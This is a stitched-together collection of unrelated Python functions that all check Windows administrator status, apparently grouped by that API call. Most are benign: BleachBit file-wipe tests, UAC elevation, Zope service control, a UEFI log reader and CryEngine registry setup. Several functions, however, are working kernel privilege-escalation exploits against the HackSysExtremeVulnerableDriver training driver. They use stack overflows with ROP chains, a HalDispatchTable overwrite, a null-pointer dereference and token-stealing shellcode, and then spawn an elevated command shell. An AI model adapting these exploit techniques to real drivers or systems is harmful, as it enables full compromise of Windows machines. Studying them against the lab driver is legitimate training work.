def symlink_helper(link_fn): if 'nt' == os.name: from win32com.shell import shell if not shell.IsUserAnAdmin(): print 'WARNING: skipping symlink test because of insufficient privileges' return # make regular file (fd, srcname) = tempfile.mkstemp( prefix='bleachbit-test-delete-regular') os.close(fd) # make symlink self.assert_(os.path.exists(srcname)) linkname = tempfile.mktemp('bblink') self.assert_(not os.path.exists(linkname)) link_fn(srcname, linkname) self.assert_(os.path.exists(linkname)) self.assert_(os.path.lexists(linkname)) # delete symlink delete(linkname, shred) self.assert_(os.path.exists(srcname)) self.assert_(not os.path.lexists(linkname)) # delete regular file delete(srcname, shred) self.assert_(not os.path.exists(srcname)) # # test broken symlink # (fd, srcname) = tempfile.mkstemp(prefix='bleachbit-test-delete-sym') os.close(fd) self.assert_(os.path.lexists(srcname)) link_fn(srcname, linkname) self.assert_(os.path.lexists(linkname)) self.assert_(os.path.exists(linkname)) # delete regular file first delete(srcname, shred) self.assert_(not os.path.exists(srcname)) # clean up delete(linkname, shred) self.assert_(not os.path.exists(linkname)) self.assert_(not os.path.lexists(linkname))
def _test_wipe(contents): shortname = _write_file(longname, contents) logger.debug('test_file_wipe(): filename length={}, shortname length ={}, contents length={}'.format( len(longname), len(shortname), len(contents))) if shell.IsUserAnAdmin(): # wiping requires admin privileges file_wipe(shortname) file_wipe(longname) else: with self.assertRaises(pywintypes.error): file_wipe(shortname) file_wipe(longname) self.assertExists(shortname) os.remove(extended_path(shortname)) self.assertNotExists(shortname)
def elevate_privileges(): """On Windows Vista and later, try to get administrator privileges. If successful, return True (so original process can exit). If failed or not applicable, return False.""" if shell.IsUserAnAdmin(): logger.debug('already an admin (UAC not required)') return False if hasattr(sys, 'frozen'): # running frozen in py2exe exe = sys.executable parameters = "--gui --no-uac" else: pyfile = os.path.join(bleachbit.bleachbit_exe_path, 'bleachbit.py') # If the Python file is on a network drive, do not offer the UAC because # the administrator may not have privileges and user will not be # prompted. if len(pyfile) > 0 and path_on_network(pyfile): logger.debug("debug: skipping UAC because '%s' is on network", pyfile) return False parameters = '"%s" --gui --no-uac' % pyfile exe = sys.executable # add any command line parameters such as --debug-log parameters = "%s %s" % (parameters, ' '.join(sys.argv[1:])) logger.debug('elevate_privileges() exe=%s, parameters=%s', exe, parameters) rc = None try: rc = shell.ShellExecuteEx(lpVerb='runas', lpFile=exe, lpParameters=parameters, nShow=win32con.SW_SHOW) except pywintypes.error as e: if 1223 == e.winerror: logger.debug('user denied the UAC dialog') return False raise logger.debug('ShellExecuteEx=%s', rc) if isinstance(rc, dict): return True return False
def test_Locked(self): """Test Worker using Action.LockedAction""" from win32com.shell import shell if shell.IsUserAnAdmin(): # If an admin, the first attempt will mark for delete (3 bytes), # and the second attempt will actually delete it (3 bytes). errors_expected = 0 bytes_expected = 3 + 3 total_deleted = 2 else: # If not an admin, the first attempt will fail, and the second wil succeed. errors_expected = 1 bytes_expected = 3 total_deleted = 1 self.action_test_helper('locked', 0, errors_expected, None, None, bytes_expected, total_deleted)
def test_delete_locked_file(self): """Unit test for delete_locked_file""" tests = (('regular', u'unicode-emdash-u\u2014', 'long' + 'x' * 100)) for test in tests: (fd, pathname) = tempfile.mkstemp( prefix='bleachbit-delete-locked-file', suffix=test) os.close(fd) self.assert_(os.path.exists(pathname)) try: delete_locked_file(pathname) except pywintypes.error, e: if 5 == e.winerror and not shell.IsUserAnAdmin(): pass else: raise self.assert_(os.path.exists(pathname))
def trigger_stack_overflow(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA( "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: debug_print("[!] Driver handle not found : Error " + str(ctypes.GetLastError())) sys.exit() base_addresses = get_base_address(["hal.dll", "win32kfull.sys"]) hal_base_address = base_addresses[0] win32kfull_base_address = base_addresses[1] shellcode_ptr = virtual_alloc_payload() debug_print("[+] Constructing malicious buffer w/ ROP chain") evil_input = "\x41" * 0x808 # junk evil_input += struct.pack("<Q", win32kfull_base_address + 0xD1122) # POP RDX; RETN evil_input += struct.pack("<Q", 0x63000000) # 0x63000000 -> Supervisor Mode evil_input += struct.pack("<Q", hal_base_address + 0xFDB2) # POP RAX; RETN evil_input += struct.pack("<Q", get_pxe_address(shellcode_ptr) - 3) # PTE(shellcode ptr) - 3 evil_input += struct.pack("<Q", hal_base_address + 0x9943) # MOV [RAX], EDX; RETN evil_input += struct.pack("<Q", hal_base_address + 0x19B20) # Invalidate Cache evil_input += struct.pack("<Q", shellcode_ptr) # shellcode ptr evil_size = len(evil_input) evil_input_ptr = id(evil_input) + 32 debug_print("[+] Buf size: 0x%X" % evil_size) debug_print("[+] Sending malicious buffer") debug_print("[+] Triggering vuln ..") kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0, byref(dwReturn), None) if shell.IsUserAnAdmin(): debug_print("[*] Enjoy Elevated Privs !\n") os.system('cmd.exe') else: debug_print("[!] Exploit did not work. Re-run it!")
def elevate(console=True, _argument='forced_elevate'): """Elevate the program to admin permissions.""" if shell.IsUserAnAdmin() or sys.argv[-1] == _argument: return True script = os.path.abspath(sys.argv[0]) params = ' '.join([script] + sys.argv[1:] + [_argument]) try: shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params, nShow=5 if console else 0) except pywintypes.error: pass else: sys.exit(0) return False
def symlink_helper(link_fn): if 'nt' == os.name: from win32com.shell import shell if not shell.IsUserAnAdmin(): self.skipTest( 'skipping symlink test because of insufficient privileges' ) # make regular file srcname = self.mkstemp(prefix='bleachbit-test-delete-regular') # make symlink self.assertExists(srcname) linkname = tempfile.mktemp('bblink') self.assertNotExists(linkname) link_fn(srcname, linkname) self.assertExists(linkname) self.assertLExists(linkname) # delete symlink delete(linkname, shred) self.assertExists(srcname) self.assertNotLExists(linkname) # delete regular file delete(srcname, shred) self.assertNotExists(srcname) # # test broken symlink # srcname = self.mkstemp(prefix='bleachbit-test-delete-sym') self.assertLExists(srcname) link_fn(srcname, linkname) self.assertLExists(linkname) self.assertExists(linkname) # delete regular file first delete(srcname, shred) self.assertNotExists(srcname) self.assertLExists(linkname) # clean up delete(linkname, shred) self.assertNotExists(linkname) self.assertNotLExists(linkname)
def main(): handle = kernel32.CreateFileA( lpFileName, #lpFileName GENERIC_READ | GENERIC_WRITE, #dwDesiredAccess 0, #dwShareMode None, #lpSecurityAttributes OPEN_EXISTING, #dwCreationDisposition 0, #dwFlagsAndAttributes None) #hTemplateFile if handle == INVALID_HANDLE_VALUE: print("[-] Failed to open device file. Error: " + str(kernel32.GetLastError())) sys.exit() #assign What and Where shellcode = struct.pack("<L", shellcode_addr + 4) + token_stealing_shellcode() alloc_memory(shellcode_addr, len(shellcode), shellcode) shellcode_addr_ptr = shellcode_addr What = shellcode_addr_ptr HalDispatchTable = getHalDispatchTable() Where = HalDispatchTable + 0x4 payload = struct.pack("<L", What) + struct.pack("<L", Where) payload_addr = id(payload) + 0x14 lpBytesReturned = c_ulong() kernel32.DeviceIoControl( handle, #hDevice IOCTL_CODE, #dwIoControlCode payload_addr, #lpInBuffer len(payload), #nInBufferSize None, #lpOutBuffer 0, #noutBufferSize byref(lpBytesReturned), #lpBytesReturned None) #lpOverlapped p1 = c_ulong(0xdead) p2 = c_ulong() ntdll.NtQueryIntervalProfile(p1, byref(p2)) if shell.IsUserAnAdmin(): print("[+] Priv esc achieved!") print("[+] Here is your root shell!") new_process = subprocess.Popen("start cmd", shell=True) else: print("[-] Priv esc failed!")
def elevate_privileges(): """On Windows Vista and later, try to get administrator privileges. If successful, return True (so original process can exit). If failed or not applicable, return False.""" if platform.version() <= '5.2': # Earlier than Vista return False if shell.IsUserAnAdmin(): print 'debug: already an admin (UAC not required)' return False if hasattr(sys, 'frozen'): # running frozen in py2exe exe = unicode(sys.executable, sys.getfilesystemencoding()) py = "--gui --no-uac" else: # __file__ is absolute path to bleachbit/Windows.py pydir = os.path.dirname(unicode(__file__, sys.getfilesystemencoding())) pyfile = os.path.join(pydir, 'GUI.py') # If the Python file is on a network drive, do not offer the UAC because # the administrator may not have privileges and user will not be # prompted. if len(pyfile) > 0 and path_on_network(pyfile): print "debug: skipping UAC because '%s' is on network" % pyfile return False py = '"%s" --gui --no-uac' % pyfile exe = sys.executable print 'debug: exe=', exe, ' parameters=', py rc = None try: rc = shell.ShellExecuteEx(lpVerb='runas', lpFile=exe, lpParameters=py, nShow=win32con.SW_SHOW) except pywintypes.error, e: if 1223 == e.winerror: print 'debug: user denied the UAC dialog' return False raise
def do_stop(self, arg): if not shell.IsUserAnAdmin(): print(ERR_MSG_NOT_ADMIN) return status = self._get_service_status() if status is None: print('ERROR: Zope is not installed as Windows service.') return elif status == win32service.SERVICE_STOPPED: print('ERROR: The Zope Windows service has not been started.') return name = self._get_service_name() try: win32serviceutil.StopService(name) print('Stopping Windows Service "{}".'.format(name)) except pywintypes.error: traceback.print_exc()
def delete_locked_file(pathname): """Delete a file that is currently in use""" if os.path.exists(pathname): try: win32api.MoveFileEx(pathname, None, win32con.MOVEFILE_DELAY_UNTIL_REBOOT) except pywintypes.error, e: if not 5 == e.winerror: raise e if shell.IsUserAnAdmin(): logger = logging.getLogger(__name__) logger.warning( 'Unable to queue locked file for deletion, even with administrator rights: %s' % pathname) return # show more useful message than "error: (5, 'MoveFileEx', 'Access # is denied.')" raise RuntimeError( 'Access denied when attempting to delete locked file without administrator rights: %s' % pathname)
def create_com_object(self): """Create PcommServer.PmacDevice object. Returns: True if successful, False otherwise. """ try: if not _shell.IsUserAnAdmin(): if self.logger is not None: self.logger.error( 'Fail to connect pmac: user is not a admin.') return False self._com_obj = _client.Dispatch('PcommServer.PmacDevice') return True except Exception: if self.logger is not None: self.logger.error('exception', exc_info=True) return False
def diagnostic_info(): """Return diagnostic information as a string""" s = "BleachBit version %s" % Common.APP_VERSION try: import gtk s += '\nGTK version %s' % '.'.join([str(x) for x in gtk.gtk_version]) except: pass s += "\nlocal_cleaners_dir = %s" % Common.local_cleaners_dir s += "\nlocale_dir = %s" % Common.locale_dir s += "\noptions_dir = %s" % Common.options_dir s += "\npersonal_cleaners_dir = %s" % Common.personal_cleaners_dir s += "\nsystem_cleaners_dir = %s" % Common.system_cleaners_dir s += "\nlocale.getdefaultlocale = %s" % str(locale.getdefaultlocale()) if 'posix' == os.name: envs = ('DESKTOP_SESSION', 'LOGNAME', 'USER', 'SUDO_UID') if 'nt' == os.name: envs = ('APPDATA', 'LocalAppData', 'LocalAppDataLow', 'Music', 'USERPROFILE', 'ProgramFiles', 'ProgramW6432', 'TMP') for env in envs: s += "\nos.getenv('%s') = %s" % (env, os.getenv(env)) s += "\nos.path.expanduser('~') = %s" % os.path.expanduser('~') if sys.platform.startswith('linux'): if hasattr(platform, 'linux_distribution'): s += "\nplatform.linux_distribution() = %s" % str( platform.linux_distribution()) else: s += "\nplatform.dist() = %s" % str(platform.dist()) if 'nt' == os.name: s += "\nplatform.win32_ver[1]() = %s" % platform.win32_ver()[1] s += "\nplatform.platform = %s" % platform.platform() s += "\nplatform.version = %s" % platform.version() s += "\nsys.argv = %s" % sys.argv s += "\nsys.executable = %s" % sys.executable s += "\nsys.version = %s" % sys.version if 'nt' == os.name: s += "\nwin32com.shell.shell.IsUserAnAdmin() = %s" % shell.IsUserAnAdmin( ) s += "\n__file__ = %s" % __file__ return s
def test_delete_locked_file(self): """Unit test for delete_locked_file""" tests = ('regular', u'unicode-emdash-u\u2014', 'long' + 'x' * 100) for test in tests: f = tempfile.NamedTemporaryFile( prefix='bleachbit-delete-locked-file', suffix=test, delete=False) pathname = f.name f.close() import time time.sleep(5) # avoid race condition self.assertExists(pathname) logger.debug('delete_locked_file(%s) ' % pathname) if not shell.IsUserAnAdmin(): with self.assertRaises(WindowsError): delete_locked_file(pathname) else: delete_locked_file(pathname) self.assertExists(pathname) logger.info('reboot Windows and check the three files are deleted')
def ReadLogFromUefiInterface(): if not shell.IsUserAnAdmin(): print("""DecodeUefiLog is not running as an administrator. Please run DecodeUefiLog in an administrator command prompt.""") raise SystemExit(1) InFile = tempfile.TemporaryFile() Index = 0 UefiVar = UefiVariable() rc = 0 while rc == 0: VariableName = 'V'+str(Index) (rc, var, errorstring) = UefiVar.GetUefiVar(VariableName, 'a021bf2b-34ed-4a98-859c-420ef94f3e94') if (rc == 0): Index += 1 InFile.write(var) InFile.seek(0) return InFile
def _test_wipe(contents, is_sparse=False): shortname = _write_file(longname, contents) if is_sparse: fh = open_file(extended_path(longname), mode=GENERIC_WRITE) file_make_sparse(fh) close_file(fh) logger.debug( 'test_file_wipe(): filename length={}, shortname length ={}, contents length={}, is_sparse={}' .format(len(longname), len(shortname), len(contents), is_sparse)) if shell.IsUserAnAdmin(): # wiping requires admin privileges file_wipe(shortname) file_wipe(longname) else: with self.assertRaises(pywintypes.error): file_wipe(shortname) file_wipe(longname) self.assertExists(shortname) os.remove(extended_path(shortname)) self.assertNotExists(shortname)
def main(args): if os.name == 'nt': from win32com.shell import shell if not shell.IsUserAnAdmin(): raise errors.ChalmersError( 'You must be an administrator to run this command') else: if os.getuid() != 0: raise errors.ChalmersError('You must be root to run this command') service = SystemService(args.target_user) if args.action == 'status': service.status() elif args.action == 'enable': service.install() elif args.action == 'disable': service.uninstall() else: raise errors.ChalmersError("Invalid action %s" % args.action)
def do_start(self, arg): if not shell.IsUserAnAdmin(): print(ERR_MSG_NOT_ADMIN) return status = self._get_service_status() if status is None: print('ERROR: Zope is not installed as Windows service.') return elif status == win32service.SERVICE_START_PENDING: print('ERROR: The Zope Windows service is about to start.') return elif status == win32service.SERVICE_RUNNING: print('ERROR: The Zope Windows service is already running.') return name = self._get_service_name() try: win32serviceutil.StartService(name) print('Starting Windows Service "{}".'.format(name)) except pywintypes.error: traceback.print_exc()
def trigger_overflow(): lpBytesReturned = c_ulong() handle = kernel32.CreateFileA( "\\\\.\\HackSysExtremeVulnerableDriver", #lpFileName GENERIC_READ | GENERIC_WRITE, #dwDesiredAccess 0, #dwShareMode None, #lpSecurityAttributes OPEN_EXISTING, #dwCreationDisposition 0, #DwFileAttributes, None) #hTemplateFile if not handle or handle == -1: print("[-] Failed to acquire driver handle: Error" + str(ctypes.GetLastError())) sys.exit() shellcode_addr = 0x42420000 payload_addr = 0x41410000 payload = "A" * 0x820 + struct.pack("<L", shellcode_addr) alloc_memory(payload_addr, len(payload), payload) shellcode = token_stealing_shellcode() alloc_memory(shellcode_addr, len(shellcode), shellcode) kernel32.DeviceIoControl( handle, #hDevice 2236419, #dwIoControlCode payload_addr, #lpInBuffer len(payload), #nInBufferSize None, #lpOutBuffer 0, #nOutBufferSize byref(lpBytesReturned), #lpBytesReturned None) #lpOverlapped if shell.IsUserAnAdmin(): print("[+] Privilage escalation achieved!") print("[+] Here's Your Root Shell!") #os.system('cmd.exe') new_process = subprocess.Popen("start cmd", shell=True) else: print("[-] Privilage escalation failed!")
def do_remove(self, arg): if not shell.IsUserAnAdmin(): print(ERR_MSG_NOT_ADMIN) return status = self._get_service_status() if status is None: print 'ERROR: Zope is not installed as a Windows service.' return elif not status is win32service.SERVICE_STOPPED: print 'ERROR: Please stop the Windows service before removing it.' return ret_code = 0 name = self._get_service_name() try: win32serviceutil.RemoveService(name) print 'Removed Windows Service "%s".' % name except pywintypes.error: ret_code = 1 traceback.print_exc() return ret_code
def trigger_uninitialized_heap_variable(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA( "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str( ctypes.GetLastError()) sys.exit() magicvalue = struct.pack('<I', 0xBAD0B0B1) magicvalue_ptr = id(magicvalue) + 20 magicvalue_size = len(magicvalue) tainting_lookaside() print "[+] Triggering vuln .." kernel32.DeviceIoControl(driver_handle, 0x00222033, magicvalue_ptr, magicvalue_size, None, 0, byref(dwReturn), None) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[-] Exploit did not work. Re-run it!"
def trigger_nullpointer_dereference(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA( "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str( ctypes.GetLastError()) sys.exit() NtAllocateVirtualMemory_shellcode_ptr() magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0 magicvalue_size = len(magicvalue) magicvalue_ptr = id(magicvalue) + 20 dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x22202B, magicvalue_ptr, magicvalue_size, None, 0, byref(dwReturn), None) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[-] Exploit did not work. Re-run it!"
def trigger_stack_overflow_GS(): dwReturn = c_ulong() driver_handle = kernel32.CreateFileA( "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None) if not driver_handle or driver_handle == -1: print "[!] Driver handle not found : Error " + str( ctypes.GetLastError()) sys.exit() buffer_ptr, buffer_size = create_map_file() print "[+] Sending malicious buffer" print "[+] Triggering vuln .." # Note buffer_size + 4 : +4 resides outside the mapped file to trigger an exception when memcpy the region # before GS check, which BSODs box kernel32.DeviceIoControl(driver_handle, 0x222007, buffer_ptr, buffer_size + 4, None, 0, byref(dwReturn), None) if shell.IsUserAnAdmin(): print "[*] Enjoy Elevated Privs !\r\n" os.system('cmd.exe') else: print "[!] Exploit did not work. Re-run it!"
def skipUnlessAdmin(self): if not shell.IsUserAnAdmin(): self.skipTest('requires administrator privileges')
def test_file_wipe(self): """Unit test for file_wipe There are more tests in testwipe.py """ from bleachbit.WindowsWipe import file_wipe, open_file, close_file, file_make_sparse from bleachbit.Windows import elevate_privileges from win32con import GENERIC_WRITE, WRITE_DAC dirname = tempfile.mkdtemp(prefix='bleachbit-file-wipe') filenames = ('short', 'long' + 'x' * 250, 'utf8-ɡælɪk') for filename in filenames: longname = os.path.join(dirname, filename) logger.debug('file_wipe(%s)', longname) def _write_file(longname, contents): self.write_file(longname, contents) import win32api shortname = extended_path_undo( win32api.GetShortPathName(extended_path(longname))) self.assertExists(shortname) return shortname def _deny_access(fh): import win32security import ntsecuritycon as con user, _, _ = win32security.LookupAccountName("", win32api.GetUserName()) dacl = win32security.ACL() dacl.AddAccessDeniedAce(win32security.ACL_REVISION, con.FILE_GENERIC_READ | con.FILE_GENERIC_WRITE, user) win32security.SetSecurityInfo(fh, win32security.SE_FILE_OBJECT, win32security.DACL_SECURITY_INFORMATION, None, None, dacl, None) def _test_wipe(contents, deny_access = False, is_sparse=False): shortname = _write_file(longname, contents) if deny_access or is_sparse: fh = open_file(extended_path(longname), mode=GENERIC_WRITE | WRITE_DAC) if is_sparse: file_make_sparse(fh) if deny_access: _deny_access(fh) close_file(fh) logger.debug('test_file_wipe(): filename length={}, shortname length ={}, contents length={}, is_sparse={}'.format( len(longname), len(shortname), len(contents), is_sparse)) if shell.IsUserAnAdmin(): # wiping requires admin privileges file_wipe(shortname) file_wipe(longname) else: with self.assertRaises(pywintypes.error): file_wipe(shortname) file_wipe(longname) self.assertExists(shortname) os.remove(extended_path(shortname)) self.assertNotExists(shortname) # A small file that fits in MFT _test_wipe(b'') # requires wiping of extents _test_wipe(b'secret' * 100000) # requires wiping of extents: special file case elevate_privileges(False) _test_wipe(b'secret' * 100000, deny_access = True, is_sparse=True) shutil.rmtree(dirname, True) if shell.IsUserAnAdmin(): logger.warning( 'You should also run test_file_wipe() without admin privileges.') else: logger.warning( 'You should also run test_file_wipe() with admin privileges.')
def main(queue_results, queue_errors): log.info("Starting with process ID %d", os.getpid()) # Check if the user is an Administrator. # If not, quit with an error message. if not shell.IsUserAnAdmin(): log.error("The user is not an Administrator, aborting") queue_errors.put('NOT_AN_ADMIN') return # Generate configuration values. cfg = Config() # Check if this is a supported version of Windows and if so, obtain the # volatility profile name. cfg.get_profile_name() if not cfg.profile: log.error("Unsupported version of Windows, can't select a profile") queue_errors.put('UNSUPPORTED_WINDOWS') return log.info("Selected Profile Name: {0}".format(cfg.profile)) # Obtain the path to the driver to load. At this point, this check should # not fail, but you never know. if not cfg.get_driver_path(): log.error("Unable to find a proper winpmem driver") queue_errors.put('NO_DRIVER') return log.info("Selected Driver: {0}".format(cfg.driver)) # This is the ugliest black magic ever, but somehow helps. # Just tries to brutally destroy the winpmem service if there is one # lying around before trying to launch a new one again. destroyer = threading.Thread(target=destroy, args=(cfg.driver, cfg.service_name)) destroyer.start() destroyer.join() # Initialize the winpmem service. try: service = Service(driver=cfg.driver, service=cfg.service_name) service.create() service.start() except DetectorError as e: log.critical("Unable to start winpmem service: %s", e) queue_errors.put('SERVICE_NO_START') return else: log.info("Service started") # Launch the scanner. try: scan(cfg.service_path, cfg.profile, queue_results) except DetectorError as e: log.critical("Yara scanning failed: %s", e) queue_errors.put('SCAN_FAILED') else: log.info("Scanning finished") # Stop the winpmem service and unload the driver. At this point we should # have cleaned up everything left on the system. try: service.stop() service.delete() except DetectorError as e: log.error("Unable to stop winpmem service: %s", e) else: log.info("Service stopped") log.info("Analysis finished")
def isAdmin(): return shell.IsUserAnAdmin()
def is_root_user(): return shell.IsUserAnAdmin()
def cmd_install(args): uninstall_integration() #--- if getattr(sys, 'frozen', False): ScriptPath = os.path.abspath(sys.executable) engine_commands = (('add', 'Register engine', '"%s" add "%%1"' % ScriptPath), ) # --- extended, action, title, command # The first collumn difines extended action. The associated commands will be displayed only when the user right-clicks an object while also pressing the SHIFT key. # https://msdn.microsoft.com/en-us/library/cc144171(VS.85).aspx project_commands = ( (False, 'edit', 'Launch editor', '"%s" edit "%%1"' % ScriptPath), (False, 'open', 'Launch game', '"%s" open "%%1"' % ScriptPath), (False, 'monodev', 'Edit code', '"%s" monodev "%%1"' % ScriptPath), (False, '_build', 'Build solution', '"%s" build "%%1"' % ScriptPath), (False, '_projgen', 'Generate solution', '"%s" projgen "%%1"' % ScriptPath), (False, '_switch', 'Switch engine version', '"%s" switch "%%1"' % ScriptPath), (False, '_deploy', 'Deploy build', '"%s" deploy "%%1"' % ScriptPath), (True, 'metagen', 'Generate/repair metadata', '"%s" metagen "%%1"' % ScriptPath), ) else: ScriptPath = os.path.abspath(__file__) PythonPath = python3_path() engine_commands = (('add', 'Register engine', '"%s" "%s" add "%%1"' % (PythonPath, ScriptPath)), ) project_commands = ( (False, 'edit', 'Launch editor', '"%s" "%s" edit "%%1"' % (PythonPath, ScriptPath)), (False, 'open', 'Launch game', '"%s" "%s" open "%%1"' % (PythonPath, ScriptPath)), (False, 'monodev', 'Edit code', '"%s" monodev "%%1"' % ScriptPath), (False, '_build', 'Build solution', '"%s" "%s" build "%%1"' % (PythonPath, ScriptPath)), (False, '_projgen', 'Generate solution', '"%s" "%s" projgen "%%1"' % (PythonPath, ScriptPath)), (False, '_switch', 'Switch engine version', '"%s" "%s" switch "%%1"' % (PythonPath, ScriptPath)), (False, '_deploy', 'Deploy build', '"%s" "%s" deploy "%%1"' % (PythonPath, ScriptPath)), (True, 'metagen', 'Generate/repair metadata', '"%s" "%s" metagen "%%1"' % (PythonPath, ScriptPath)), ) #--- current_user_is_admin = shell.IsUserAnAdmin() key = False and win32con.HKEY_LOCAL_MACHINE or win32con.HKEY_CURRENT_USER hClassesRoot = win32api.RegOpenKeyEx(key, 'Software\\Classes') #https://msdn.microsoft.com/en-us/library/windows/desktop/cc144152(v=vs.85).aspx #--- .cryengine FriendlyTypeName = 'CryEngine version' ProgID = 'CrySelect.engine' AppUserModelID = 'CrySelect.engine' DefaultIcon = os.path.abspath( os.path.join(os.path.dirname(ScriptPath), 'editor_icon.ico')) hProgID = win32api.RegCreateKey(hClassesRoot, ProgID) win32api.RegSetValueEx(hProgID, None, None, win32con.REG_SZ, FriendlyTypeName) win32api.RegSetValueEx(hProgID, 'AppUserModelID', None, win32con.REG_SZ, AppUserModelID) win32api.RegSetValueEx(hProgID, 'FriendlyTypeName', None, win32con.REG_SZ, FriendlyTypeName) win32api.RegSetValue(hProgID, 'DefaultIcon', win32con.REG_SZ, DefaultIcon) #--- hShell = win32api.RegCreateKey(hProgID, 'shell') win32api.RegCloseKey(hProgID) for action, title, command in engine_commands: hAction = win32api.RegCreateKey(hShell, action) win32api.RegSetValueEx(hAction, None, None, win32con.REG_SZ, title) win32api.RegSetValueEx(hAction, 'Icon', None, win32con.REG_SZ, DefaultIcon) win32api.RegSetValue(hAction, 'command', win32con.REG_SZ, command) win32api.RegCloseKey(hAction) action = 'add' win32api.RegSetValueEx(hShell, None, None, win32con.REG_SZ, action) win32api.RegCloseKey(hShell) #--- hCryProj = win32api.RegCreateKey(hClassesRoot, cryregistry.ENGINE_EXTENSION) win32api.RegSetValueEx(hCryProj, None, None, win32con.REG_SZ, ProgID) win32api.RegCloseKey(hCryProj) #--- .cryproject FriendlyTypeName = 'CryEngine project' ProgID = 'CrySelect.project' AppUserModelID = 'CrySelect.project' DefaultIcon = os.path.abspath( os.path.join(os.path.dirname(ScriptPath), 'editor_icon16.ico')) hProgID = win32api.RegCreateKey(hClassesRoot, ProgID) win32api.RegSetValueEx(hProgID, None, None, win32con.REG_SZ, FriendlyTypeName) win32api.RegSetValueEx(hProgID, 'AppUserModelID', None, win32con.REG_SZ, AppUserModelID) win32api.RegSetValueEx(hProgID, 'FriendlyTypeName', None, win32con.REG_SZ, FriendlyTypeName) win32api.RegSetValue(hProgID, 'DefaultIcon', win32con.REG_SZ, DefaultIcon) #--- hShell = win32api.RegCreateKey(hProgID, 'shell') win32api.RegCloseKey(hProgID) for extended, action, title, command in project_commands: hAction = win32api.RegCreateKey(hShell, action) win32api.RegSetValueEx(hAction, None, None, win32con.REG_SZ, title) win32api.RegSetValueEx(hAction, 'Icon', None, win32con.REG_SZ, DefaultIcon) win32api.RegSetValue(hAction, 'command', win32con.REG_SZ, command) if extended: win32api.RegSetValueEx(hAction, 'extended', None, win32con.REG_SZ, '') win32api.RegCloseKey(hAction) action = 'edit' win32api.RegSetValueEx(hShell, None, None, win32con.REG_SZ, action) win32api.RegCloseKey(hShell) #--- hCryProj = win32api.RegCreateKey(hClassesRoot, '.cryproject') win32api.RegSetValueEx(hCryProj, None, None, win32con.REG_SZ, ProgID) win32api.RegCloseKey(hCryProj)